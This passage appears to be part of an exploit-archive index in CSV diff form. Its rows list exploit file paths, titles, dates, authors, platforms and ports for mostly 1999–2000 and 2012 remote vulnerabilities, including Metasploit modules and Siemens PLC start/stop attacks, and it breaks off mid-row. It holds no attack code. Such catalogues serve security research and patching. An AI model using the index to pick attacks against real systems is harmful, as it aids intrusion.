+19682,exploits/novell/remote/19682.txt,"Netscape Enterprise Server / Novell Groupwise 5.2/5.5 - 'GWWEB.EXE' Multiple Vulnerabilities",1999-12-19,"Sacha Faust Bourque",remote,novell, +19686,exploits/multiple/remote/19686.txt,"Microsoft Internet Explorer 4/5/5.5/5.0.1 - external.NavigateAndFind() Cross-Frame",1999-12-22,"Georgi Guninski",remote,multiple, +19688,exploits/windows/remote/19688.txt,"ZBServer Pro 1.5 - Remote Buffer Overflow (1)",1999-12-23,"Ussr Labs",remote,windows, +19689,exploits/windows/remote/19689.c,"ZBServer Pro 1.5 - Remote Buffer Overflow (2)",1999-12-23,Izan,remote,windows, +19690,exploits/unix/remote/19690.txt,"glFTPd 1.17.2 - Code Execution",1999-12-23,suid,remote,unix, +19691,exploits/multiple/remote/19691.pl,"Tony Greenwood WebWho+ 1.1 - Remote Command Execution",1999-12-26,loophole,remote,multiple, +19694,exploits/unix/remote/19694.txt,"AltaVista Search Intranet 2.0 b/2.3 - Directory Traversal",1999-12-29,"Rudi Carell",remote,unix, +19696,exploits/solaris/remote/19696.c,"Hughes Technologies Mini SQL (mSQL) 2.0.11 - 'w3-msql' Remote Buffer Overflow",1999-10-28,Zhodiac,remote,solaris, +19705,exploits/unixware/remote/19705.c,"Netscape FastTrack Server 2.0.1a - GET Buffer Overflow",1999-12-31,"Brock Tellier",remote,unixware, +19708,exploits/php/remote/19708.php,"PHP 3.0.13 - 'Safe_mode' Failure",2000-01-04,"Kristian Koehntopp",remote,php, +19712,exploits/multiple/remote/19712.txt,"Allaire ColdFusion Server 4.0/4.0.1 - 'CFCACHE' Information Disclosure",2000-01-04,anonymous,remote,multiple, +19713,exploits/cgi/remote/19713.pl,"Solution Scripts Home Free 1.0 - 'search.cgi' Directory Traversal",2000-01-03,"k0ad k1d",remote,cgi, +40086,exploits/ruby/remote/40086.rb,"Ruby on Rails ActionPack Inline ERB - Code Execution (Metasploit)",2016-07-11,Metasploit,remote,ruby,80 +19717,exploits/java/remote/19717.rb,"Java Applet - Field Bytecode Verifier Cache Remote Code Execution (Metasploit)",2012-07-11,Metasploit,remote,java, +19718,exploits/windows/remote/19718.rb,"AdminStudio - 'LaunchHelp.dll' ActiveX Arbitrary Code Execution (Metasploit)",2012-07-11,Metasploit,remote,windows, +19719,exploits/windows/remote/19719.txt,"Microsoft Internet Explorer 4.0/4.0.1/5.0/5.0.1/5.5 - preview Security Zone Settings Lag",2000-01-07,"Georgi Guninski",remote,windows, +19722,exploits/unix/remote/19722.txt,"RedHat 6.1 / IRIX 6.5.18 - 'lpd' Command Execution",2000-01-11,anonymous,remote,unix, +19724,exploits/windows/remote/19724.txt,"Mirabilis ICQ 0.99b 1.1.1.1/3.19 - Remote Buffer Overflow",2000-01-12,"Drew Copley",remote,windows, +19729,exploits/linux/remote/19729.c,"Qualcomm qpopper 3.0 - 'LIST' Remote Buffer Overflow",2000-01-10,Zhodiac,remote,linux, +19730,exploits/windows/remote/19730.c,"A-V Tronics InetServ 3.0 - WebMail GET",2000-01-17,"Greg Hoglund",remote,windows, +19731,exploits/windows/remote/19731.c,"Microsoft Index Server 2.0 / Indexing Service (Windows 2000) - Directory Traversal",2000-01-26,fredrik.widlund,remote,windows, +19732,exploits/multiple/remote/19732.html,"Check Point Software Firewall-1 3.0 Script - Tag Checking Bypass",2000-01-29,"Arne Vidstrom",remote,multiple, +19734,exploits/windows/remote/19734.java,"Microsoft Virtual Machine 2000 - Series/3000 Series getSystemResource",2000-01-31,"Hiromitsu Takagi",remote,windows, +19889,exploits/windows/remote/19889.c,"Microsoft Windows 95/98 - NetBIOS NULL Name",2000-05-02,"rain forest puppy",remote,windows, +19737,exploits/windows/remote/19737.c,"H. Nomura Tiny FTPDaemon 0.52 - Multiple Buffer Overflow Vulnerabilities",2000-02-01,UNYUN,remote,windows, +19738,exploits/windows/remote/19738.txt,"Microsoft Outlook Express 5 - JavaScript Email Access",2000-02-01,"Georgi Guninski",remote,windows, +19741,exploits/cgi/remote/19741.pl,"Wired Community Software WWWThreads 5.0 - SQL Command Input",2000-02-03,"rain forest puppy",remote,cgi, +19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple, +19743,exploits/windows/remote/19743.txt,"Cat Soft Serv-U FTP Server 2.5/a/b (Windows 95/98/2000/NT 4.0) - Shortcut",2000-02-04,"Ussr Labs",remote,windows, +19745,exploits/cgi/remote/19745.txt,"Daniel Beckham The Finger Server 0.82 Beta - Pipe",2000-02-04,"Iain Wade",remote,cgi, +19747,exploits/cgi/remote/19747.txt,"Zeus Web Server 3.x - Null Terminated Strings",2000-02-08,"Vanja Hrustic",remote,cgi, +19749,exploits/multiple/remote/19749.txt,"ISC BIND 4.9.7/8.x - Traffic Amplification and NS Route Discovery",2000-02-14,Sebastian,remote,multiple, +19751,exploits/multiple/remote/19751.txt,"Ascom COLTSOHO / Brocade Fabric OS / MatchBox / Win98/NT4 / Solaris / Xyplex - SNMP World Writeable Community",2000-02-15,"Michal Zalewski",remote,multiple, +19753,exploits/windows/remote/19753.txt,"Microsoft FrontPage Personal Web Server 1.0/4.0 - Directory Traversal",1996-01-17,kiborg,remote,windows, +19761,exploits/windows/remote/19761.txt,"Sambar Server 4.2 Beta 7 - Batch CGI",2000-02-24,"Georich Chorbadzhiyski",remote,windows, +19781,exploits/multiple/remote/19781.sh,"Alex Heiphetz Group eZshopper 3.0 - Remote Command Execution",2000-02-27,suid,remote,multiple, +19784,exploits/multiple/remote/19784.txt,"Axis Communications StorPoint CD - Authentication Bypass",2000-03-01,"Infosec Swedish based tigerteam",remote,multiple, +19785,exploits/unix/remote/19785.txt,"The ht://Dig Group ht://Dig 3.1.1/3.1.2/3.1.3/3.1.4/3.2 .0b1 - Arbitrary File Inclusion",2000-02-29,"Geoff Hutchison",remote,unix, +19786,exploits/cgi/remote/19786.txt,"DNSTools Software DNSTools 1.0.8/1.10 - Input Validation",2000-03-02,"Jonathan Leto",remote,cgi, +19788,exploits/irix/remote/19788.pl,"SGI InfoSearch 1.0 / SGI IRIX 6.5.x - fname",2000-03-05,rpc,remote,irix, +19830,exploits/windows/remote/19830.txt,"Microsoft Index Server 2.0 - '%20' ASP Source Disclosure",2000-03-31,"David Litchfield",remote,windows, +19795,exploits/cgi/remote/19795.txt,"Caldera OpenLinux 2.3 - rpm_query CGI",2000-03-05,harikiri,remote,cgi, +19797,exploits/unix/remote/19797.txt,"Sun StarOffice 5.1 - Arbitrary File Read",2000-03-09,"Vanja Hrustic",remote,unix, +19800,exploits/multiple/remote/19800.c,"Check Point Software Firewall-1 3.0/1 4.0 / Cisco PIX Firewall 4.x/5.x - 'ALG' Client",2000-03-10,"Dug Song",remote,multiple, +19801,exploits/linux/remote/19801.c,"Michael Sandrof IrcII 4.4-7 - Remote Buffer Overflow",2000-03-10,bladi,remote,linux, +19805,exploits/windows/remote/19805.txt,"GameHouse dldisplay - ActiveX control 0 / Real Server 5.0/7.0 Internal IP Address Disclosure",2000-03-08,tschweikle,remote,windows, +19808,exploits/cgi/remote/19808.txt,"Generation Terrorists Designs & Concepts Sojourn 2.0 - File Access",2000-03-14,"Cerberus Security Team",remote,cgi, +19809,exploits/windows/remote/19809.txt,"Oracle Web Listener 4.0.x - for NT Batch File",2000-03-15,"Cerberus Security Team",remote,windows, +19814,exploits/multiple/remote/19814.c,"Netscape Enterprise Server 3.0/3.6/3.51 - Directory Indexing",2000-03-17,"Gabriel Maggiotti",remote,multiple, +19815,exploits/windows/remote/19815.txt,"vqsoft vqserver for windows 1.9.9 - Directory Traversal",2000-03-21,"Johan Nilsson",remote,windows, +19819,exploits/windows/remote/19819.txt,"GeoCel WindMail 3.0 - Remote File Read",2000-03-27,"Quan Peng",remote,windows, +19822,exploits/irix/remote/19822.c,"SGI IRIX 5.x/6.x - Objectserver",2000-03-29,"Last Stage of Delirium",remote,irix, +19824,exploits/multiple/remote/19824.txt,"Microsoft IIS 4.0 - UNC Mapped Virtual Host",2000-03-30,"Adam Coyne",remote,multiple, +19828,exploits/multiple/remote/19828.txt,"Cobalt RaQ 2.0/3.0 - Apache .htaccess Disclosure",2000-03-31,"Paul Schreiber",remote,multiple, +19831,exploits/hardware/remote/19831.rb,"Siemens Simatic S7-300/400 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",remote,hardware,102 +19832,exploits/hardware/remote/19832.rb,"Siemens Simatic S7-300 - PLC Remote Memory Viewer (Metasploit)",2012-07-14,"Dillon Beresford",remote,hardware,8080 +19833,exploits/hardware/remote/19833.rb,"Siemens Simatic S7-1200 - CPU START/STOP Module (Metasploit)",2012-07-14,"Dillon Beresford",remote,hardware, +19842,exploits/cgi/remote/19842.txt,"TalentSoft Web+ 4.x - Directory Traversal",2000-04-12,"John P. McNeely",remote,cgi, +19844,exploits/cgi/remote/19844.txt,"CNC Technology BizDB 1.0 - 'bizdb-search.cgi' Remote Command Execution",2000-04-13,"PErfecto Technology",remote,cgi, +19845,exploits/windows/remote/19845.pl,"Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Filename Obfuscation",2000-04-14,"rain forest puppy",remote,windows, +19846,exploits/windows/remote/19846.pl,"Microsoft FrontPage 98 Server Extensions for IIS / Microsoft InterDev 1.0 - Remote Buffer Overflow",2000-04-14,"Richie & Beto",remote,windows, +19847,exploits/unix/remote/19847.c,"UoW IMAPd Server 10.234/12.264 - Remote Buffer Overflow",2002-08-01,"Gabriel A. Maggiotti",remote,unix, +19848,exploits/unix/remote/19848.pm,"UoW IMAPd Server 10.234/12.264 - LSUB Buffer Overflow (Metasploit)",2000-04-16,vlad902,remote,unix, +19849,exploits/unix/remote/19849.pm,"UoW IMAPd Serve 10.234/12.264 - COPY Buffer Overflow (Metasploit)",2000-04-16,vlad902,remote,unix, +19852,exploits/cgi/remote/19852.txt,"Dansie Shopping Cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",remote,cgi, +19857,exploits/windows/remote/19857.rb,"ALLMediaServer 0.8 - Remote Buffer Overflow (Metasploit)",2012-07-16,Metasploit,remote,windows,888 +19905,exploits/unix/remote/19905.pl,"John Donoghue Knapster 0.9/1.3.8 - File Access",2000-05-13,no_maam,remote,unix, +19868,exploits/linux/remote/19868.c,"LCDProc 0.4 - Remote Buffer Overflow",2000-04-23,"Andrew Hobgood",remote,linux, +19871,exploits/windows/remote/19871.txt,"Zone Labs ZoneAlarm 2.1 Personal Firewall - Port 67",2000-04-24,"Wally Whacker",remote,windows, +19877,exploits/windows/remote/19877.txt,"FrontPage 98/Personal WebServer 1.0 / Personal Web Server 2.0 - 'htimage.exe' File Existence Disclosure",2000-04-19,Narrow,remote,windows, +19879,exploits/linux/remote/19879.txt,"RedHat 6.2 Piranha Virtual Server Package - Default Account and Password",2000-04-24,"Max Vision",remote,linux, +19881,exploits/windows/remote/19881.txt,"McMurtrey/Whitaker & Associates Cart32 2.6/3.0 - Remote Administration Password",2000-04-27,"Cerberus Security Team",remote,windows, +19882,exploits/hardware/remote/19882.pl,"Cisco IOS 11.x/12.x - HTTP %%",2000-04-26,"Keith Woodworth",remote,hardware, +19886,exploits/multiple/remote/19886.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 Beta - Mail Logging Buffer Overflow (1)",2000-05-02,FuSyS,remote,multiple, +19887,exploits/multiple/remote/19887.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 Beta - Mail Logging Buffer Overflow (2)",2000-05-02,MaXX,remote,multiple, +19888,exploits/multiple/remote/19888.c,"Brecht Claerhout Sniffit 0.3.6 HIP/0.3.7 Beta - Mail Logging Buffer Overflow (3)",2002-01-18,g463,remote,multiple, +19890,exploits/cgi/remote/19890.txt,"ultrascripts ultraboard 1.6 - Directory Traversal",2000-05-03,"Rudi Carell",remote,cgi, +19891,exploits/linux/remote/19891.c,"Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (1)",1999-05-31,"Hugo Breton",remote,linux, +19892,exploits/linux/remote/19892.txt,"Ethereal 0.8.4/0.8.5/0.8.6 / tcpdump 3.4/3.5 alpha - DNS Decode (2)",1999-05-31,scut,remote,linux, +19893,exploits/windows/remote/19893.c,"L-Soft Listserv 1.8 - Web Archives Buffer Overflow",2000-05-01,"David Litchfield",remote,windows, +19895,exploits/windows/remote/19895.txt,"NetWin DNews 5.3 Server - Remote Buffer Overflow",2000-03-01,Joey__,remote,windows, +19897,exploits/windows/remote/19897.txt,"FrontPage 2000 / IIS 4.0/5.0 - Server Extensions Full Path Disclosure",2000-05-06,"Frankie Zie",remote,windows, +19901,exploits/hardware/remote/19901.txt,"Netopia R-series Routers 4.6.2 - Modifying SNMP Tables",2000-05-16,"Stephen Friedl",remote,hardware, +19906,exploits/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 - Environmental Variables Disclosure",2000-05-10,"Black Watch Labs",remote,multiple, +19908,exploits/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 - Malformed Filename Request",2000-05-11,"Cerberus Security Team",remote,windows, +19909,exploits/cgi/remote/19909.pl,"Mozilla Bugzilla 2.4/2.6/2.8/2.10 - Arbitrary Command Execution",2000-05-11,"Frank van Vliet karin",remote,cgi, +19913,exploits/cgi/remote/19913.txt,"George Burgyan CGI Counter 4.0.2/4.0.7 - Input Validation",2000-05-15,"Howard M. Kash III",remote,cgi, +19914,exploits/windows/remote/19914.txt,"Seattle Lab Software Emurl 2.0 - Email Account Access",2000-05-15,"Pierre Benoit",remote,windows, +19916,exploits/multiple/remote/19916.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (1)",2000-05-16,"Hugo Breton",remote,multiple, +19917,exploits/multiple/remote/19917.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (2)",2000-05-16,L0pht,remote,multiple, +19918,exploits/multiple/remote/19918.c,"Stake AntiSniff 1.0.1/Researchers 1.0 - DNS Overflow (3)",2000-05-16,L0pht,remote,multiple, +19921,exploits/cgi/remote/19921.txt,"Matt Kruse Calendar Script 2.2 - Arbitrary Command Execution",2000-05-16,suid,remote,cgi, +19922,exploits/windows/remote/19922.pl,"Internet Security Systems ICECap Manager 2.0.23 - Default Username and Password",2000-05-17,"rain forest puppy",remote,windows, +19924,exploits/bsd/remote/19924.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (1)",2000-05-16,duke,remote,bsd, +19926,exploits/linux/remote/19926.c,"Cygnus Network Security 4.0/KerbNet 5.0 / MIT Kerberos 4/5 / RedHat 6.2 - Compatibility 'krb_rd_req()' Remote Buffer Overflow (3)",2000-04-08,"Jim Paris",remote,linux, +19928,exploits/windows/remote/19928.txt,"Microsoft Active Movie Control 1.0 - Filetype",2000-05-13,http-equiv,remote,windows, +19966,exploits/linux/remote/19966.c,"Marty Bochane MDBms 0.9 - xbx Buffer Overflow",2000-05-24,"HaCk-13 TeaM",remote,linux, +19931,exploits/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Remote Buffer Overflow (Metasploit)",2012-07-19,Metasploit,remote,windows,998 +19932,exploits/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Remote Buffer Overflow (Metasploit)",2012-07-19,Metasploit,remote,windows,998 +19937,exploits/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow",2012-07-19,mr.pr0n,remote,windows, +19939,exploits/windows/remote/19939.html,"Microsoft Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access",2000-05-17,"Andrew Nosenko",remote,windows, +19942,exploits/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration",1999-12-26,anonymous,remote,windows, +19943,exploits/hardware/remote/19943.txt,"Intel Corporation Express 8100 ISDN Router - Fragmented ICMP",1990-05-19,"Dimuthu Parussalla",remote,hardware, +19944,exploits/multiple/remote/19944.pl,"Lotus Domino Enterprise Server 5.0.1/5.0.2/5.0.3 / Mail Server 5.0.1/5.0.2/5.0.3 - Remote Buffer Overflow",2000-05-18,smiler,remote,multiple, +19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple, +19947,exploits/linux/remote/19947.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow (1)",2000-05-22,"Chris Evans",remote,linux, +19948,exploits/linux/remote/19948.c,"gdm 1.0.x/2.0.x BETA/2.2.0 - XDMCP Buffer Overflow (2)",2000-05-22,AbraxaS,remote,linux, +19949,exploits/irix/remote/19949.c,"Gauntlet Firewall 4.1/4.2/5.0 / Webshield E-ppliance 100.0/300.0 / IRIX 6.5.x - Remote Buffer Overflow",2000-05-18,_Gramble_,remote,irix, +19951,exploits/cgi/remote/19951.php,"QuickCommerce 2.5/3.0 / Cart32 2.5 a/3.0 / Shop Express 1.0 / StoreCreator 3.0 Web Shopping Cart - Hidden Form Field",2000-02-01,CDI,remote,cgi, +19956,exploits/cgi/remote/19956.txt,"HP JetAdmin 5.5.177/jetadmin 5.6 - Directory Traversal",2000-05-24,"Ussr Labs",remote,cgi,8000 +19957,exploits/windows/remote/19957.txt,"Pacific Software Carello 1.2.1 - File Duplication / Source Disclosure",2000-05-24,"Cerberus Security Team",remote,windows, +19958,exploits/windows/remote/19958.rb,"Novell ZENworks Configuration Management Preboot Service - 0x6c Buffer Overflow (Metasploit)",2012-07-20,Metasploit,remote,windows, +19959,exploits/windows/remote/19959.rb,"Novell ZENworks Configuration Management Preboot Service - 0x4c Buffer Overflow (Metasploit)",2012-07-20,Metasploit,remote,windows,998 +19973,exploits/windows/remote/19973.txt,"Fastraq Mailtraq 1.1.4 - Multiple Path Vulnerabilities",2000-03-22,Slash,remote,windows, +19975,exploits/windows/remote/19975.pl,"Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 - Root Directory Access",2000-05-31,"H D Moore",remote,windows, +19976,exploits/windows/remote/19976.txt,"Concatus IMate Web Mail Server 2.5 - Remote Buffer Overflow",2000-06-01,"Delphis Consulting",remote,windows, +19978,exploits/linux/remote/19978.pl,"Atrus Trivalie Productions Simple Network Time Sync 1.0 - daemon Buffer Overflow",2000-06-01,"Ben Taylor",remote,linux, +19983,exploits/linux/remote/19983.c,"NetWin DMail 2.7/2.8 - ETRN Buffer Overflow",2000-06-01,noir,remote,linux, +19995,exploits/cgi/remote/19995.txt,"Michael Lamont Savant Web Server 2.1 - CGI Source Code Disclosure",2000-06-05,Drew,remote,cgi, +19997,exploits/windows/remote/19997.java,"Etype Eserv 2.9.2 - Logging Buffer Overflow",2000-05-10,Wizdumb,remote,windows, +19998,exploits/linux/remote/19998.c,"ISC innd 2.x - Remote Buffer Overflow",2000-06-12,"Michal Zalewski",remote,linux, +20007,exploits/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 - 'userreg.cgi' Arbitrary Command Execution",2000-04-24,fygrave,remote,cgi, +20008,exploits/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,remote,cgi, +20009,exploits/linux/remote/20009.py,"AtMail Email Server Appliance 6.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Remote Code Execution",2012-07-21,muts,remote,linux, +20019,exploits/windows/remote/20019.txt,"Cart32 3.0 - 'expdate' Administrative Information Disclosure",2000-05-03,cassius,remote,windows, +20027,exploits/multiple/remote/20027.txt,"BEA Systems WebLogic Express 3.1.8/4/5 - Source Code Disclosure",2000-06-21,"Foundstone Inc.",remote,multiple, +20028,exploits/windows/remote/20028.rb,"Simple Web Server - Connection Header Buffer Overflow (Metasploit)",2012-07-23,Metasploit,remote,windows, +20030,exploits/unix/remote/20030.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,remote,unix, +20031,exploits/linux/remote/20031.c,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,remote,linux, +20032,exploits/lin_x86/remote/20032.txt,"WU-FTPD 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,remote,lin_x86, +20040,exploits/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Remote Buffer Overflow",2000-06-27,UNYUN,remote,windows, +20041,exploits/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 - File Access",2000-06-26,"Larry W. Cashdollar",remote,cgi, +20043,exploits/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - 'SUMMON' Remote Buffer Overflow",2000-06-29,"Matt Conover",remote,linux, +20046,exploits/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 - FTP Server",2000-06-21,"Michael Zalewski",remote,unix, +20048,exploits/windows/remote/20048.txt,"Microsoft Windows Server 2000 - Remote CPU-overload",2000-06-30,"SecureXpert Labs",remote,windows, +20059,exploits/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",remote,cgi, +20060,exploits/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,remote,linux, +20061,exploits/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,remote,linux, +20065,exploits/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",remote,windows, +20066,exploits/windows/remote/20066.java,"Michael Lamont Savant Web Server 2.1/3.0 - Remote Buffer Overflow",2000-07-03,Wizdumb,remote,windows, +20067,exploits/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",remote,hardware, +20068,exploits/cgi/remote/20068.txt,"Sean MacGuire Big Brother 1.x - Directory Traversal",2000-07-11,"Eric Hines",remote,cgi, +20070,exploits/windows/remote/20070.txt,"alt-n WorldClient standard 2.1 - Directory Traversal",2000-07-12,"Rikard Carlsson",remote,windows, +20074,exploits/windows/remote/20074.java,"Infopulse GateKeeper 3.5 - Remote Buffer Overflow",2000-07-13,Wizdumb,remote,windows, +20075,exploits/linux/remote/20075.c,"Conectiva 4.x/5.x / Debian 2.x / RedHat 6.x / S.u.S.E 6.x/7.0 / Trustix 1.x - rpc.statd Remote Format String (1)",2000-07-16,drow,remote,linux, +20076,exploits/linux/remote/20076.c,"Conectiva 4.x/5.x / Debian 2.x / RedHat 6.x / S.u.S.E 6.x/7.0 / Trustix 1.x - rpc.statd Remote Format String (2)",2000-08-01,Doing,remote,linux, +20077,exploits/linux/remote/20077.c,"Conectiva 4.x/5.x / Debian 2.x / RedHat 6.x / S.u.S.E 6.x/7.0 / Trustix 1.x - rpc.statd Remote Format String (3)",2000-08-03,ron1n,remote,linux, +20078,exploits/windows/remote/20078.pl,"Microsoft Outlook 97/98/2000 / Outlook Express 4.0/5.0 - GMT Field Buffer Overflow (1)",2000-07-18,"Ussr Labs",remote,windows, +20079,exploits/windows/remote/20079.txt,"Microsoft Outlook 97/98/2000 / Outlook Express 4.0/5.0 - GMT Field Buffer Overflow (2)",2000-07-18,"Ussr Labs",remote,windows, +20082,exploits/unix/remote/20082.txt,"University of Washington pop2d 4.46/4.51/4.54/4.55 - Remote File Read",2000-07-14,mandark,remote,unix, +20085,exploits/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 - Piped Command",2000-07-18,Prizm,remote,cgi, +20086,exploits/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Remote Buffer Overflow",2000-06-01,"Robert Horton",remote,windows, +20088,exploits/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - 'pbcontrol.php' Root Remote Code Execution",2012-07-24,muts,remote,linux, +20089,exploits/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 - Source Fragment Disclosure",2000-07-17,"Zuo Lei",remote,windows, +20091,exploits/multiple/remote/20091.txt,"Stalker CommuniGate Pro 3.2.4 - Arbitrary File Read",2000-04-03,S21Sec,remote,multiple, +20095,exploits/multiple/remote/20095.txt,"Sun Java Web Server 1.1.3/2.0 Servlets - information Disclosure",2000-07-20,"kevin j",remote,multiple, +20096,exploits/windows/remote/20096.txt,"Microsoft IIS 2.0/3.0/4.0/5.0/5.1 - Internal IP Address Disclosure",2000-07-13,"Dougal Campbell",remote,windows, +20097,exploits/multiple/remote/20097.txt,"IBM Websphere Application Server 2.0./3.0/3.0.2.1 - Showcode",2000-07-24,"Shreeraj Shah",remote,multiple, +20103,exploits/windows/remote/20103.txt,"AnalogX SimpleServer:WWW 1.0.6 - Directory Traversal",2000-07-26,"Foundstone Inc.",remote,windows, +20104,exploits/multiple/remote/20104.txt,"Roxen WebServer 2.0.x - '%00' Request File/Directory Disclosure",2000-07-21,zorgon,remote,multiple, +20105,exploits/linux/remote/20105.txt,"Conectiva 4.x/5.x / RedHat 6.x - pam_console Remote User",2000-07-27,bkw1a,remote,linux, +20106,exploits/windows/remote/20106.cpp,"Microsoft Windows NT 4.0/2000 - NetBIOS Name Conflict",2000-08-01,"Sir Dystic",remote,windows, +20112,exploits/windows/remote/20112.rb,"Cisco Linksys PlayerPT - ActiveX Control Buffer Overflow (Metasploit)",2012-07-27,Metasploit,remote,windows, +20113,exploits/linux/remote/20113.rb,"Symantec Web Gateway 5.0.2.18 - 'pbcontrol.php' Command Injection (Metasploit)",2012-07-27,Metasploit,remote,linux, +20301,exploits/windows/remote/20301.php,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (4)",2000-10-17,BoloTron,remote,windows, +20145,exploits/linux/remote/20145.c,"Aptis Software TotalBill 3.0 - Remote Command Execution",2000-08-08,"Brian Masney",remote,linux, +20125,exploits/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",remote,windows, +20131,exploits/multiple/remote/20131.txt,"Apache Tomcat 3.1 - Path Revealing",2000-07-20,"ET LoWNOISE",remote,multiple, +20132,exploits/multiple/remote/20132.txt,"Tomcat 3.0/3.1 Snoop Servlet - Information Disclosure",2000-07-20,"ET LoWNOISE",remote,multiple, +20134,exploits/windows/remote/20134.pl,"NAI Net Tools PKI Server 1.0 - 'strong.exe' Remote Buffer Overflow",2000-08-02,juliano,remote,windows, +20135,exploits/windows/remote/20135.txt,"nai net tools pki server 1.0 - Directory Traversal",2000-08-02,"Juliano Rizzo",remote,windows, +20136,exploits/windows/remote/20136.txt,"NAI Net Tools PKI Server 1.0 - Format String",2000-08-02,"Juliano Rizzo",remote,windows, +20139,exploits/multiple/remote/20139.txt,"Sun JDK 1.1.x / Sun JRE 1.1.x - Listening Socket",2000-08-03,"Alexey Yarovinsky",remote,multiple, +20140,exploits/multiple/remote/20140.txt,"Netscape Communicator 4.x - URL Read",2000-08-03,"Dan Brumleve",remote,multiple, +20143,exploits/linux/remote/20143.txt,"Luca Deri ntop 1.2 a7-9 - Unauthorized File Retrieval",2000-08-02,dubhe,remote,linux, +20144,exploits/solaris/remote/20144.txt,"Sun AnswerBook2 1.4.2/1.4.3/1.4.4 - Administration Interface Access",2000-08-08,"Lluis Mora",remote,solaris, +20146,exploits/solaris/remote/20146.txt,"Solaris AnswerBook2 - Remote Command Execution",2000-08-07,"Lluis Mora",remote,solaris, +20148,exploits/windows/remote/20148.pl,"MediaHouse Software Statistics Server LiveStats 5.2 - Remote Buffer Overflow",2000-08-10,Zan,remote,windows, +20149,exploits/irix/remote/20149.c,"IRIX 5.2/5.3/6.x - TelnetD Environment Variable Format String",2000-07-01,"Last Stage of Delirium",remote,irix, +20150,exploits/unix/remote/20150.c,"Luca Deri ntop 1.2 a7-9/1.3.1 - Remote Buffer Overflow",2000-08-14,anonymous,remote,unix, +20151,exploits/windows/remote/20151.pl,"Microsoft IIS 5.0 - 'Translate: f' Source Disclosure (1)",2000-08-14,smiler,remote,windows, +20152,exploits/windows/remote/20152.pl,"Microsoft IIS 5.0 - 'Translate: f' Source Disclosure (2)",2000-08-14,"Roelof Temmingh",remote,windows, +20156,exploits/cgi/remote/20156.txt,"netwin netauth 4.2 - Directory Traversal",2000-08-17,"Marc Maiffret",remote,cgi, +20157,exploits/linux/remote/20157.c,"UMN Gopherd 2.x - Halidate Function Buffer Overflow",2000-08-20,"Chris Sharp",remote,linux, +20159,exploits/linux/remote/20159.c,"Darxite 0.4 - Login Buffer Overflow",2000-08-22,Scrippie,remote,linux, +20161,exploits/linux/remote/20161.txt,"X-Chat 1.2/1.3/1.4/1.5 - Command Execution via URLs",2000-08-17,"zenith parsec",remote,linux, +20163,exploits/unix/remote/20163.c,"WorldView 6.5/Wnn4 4.2 - Asian Language Server Remote Buffer Overflow",2000-03-08,UNYUN,remote,unix, +20164,exploits/cgi/remote/20164.pl,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (1)",2000-08-23,teleh0r,remote,cgi, +20165,exploits/cgi/remote/20165.html,"CGI Script Center Account Manager 1.0 LITE / PRO - Administrative Password Alteration (2)",2000-08-23,n30,remote,cgi, +20168,exploits/php/remote/20168.pl,"pBot - Remote Code Execution",2012-08-01,bwall,remote,php, +20174,exploits/windows/remote/20174.rb,"Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow 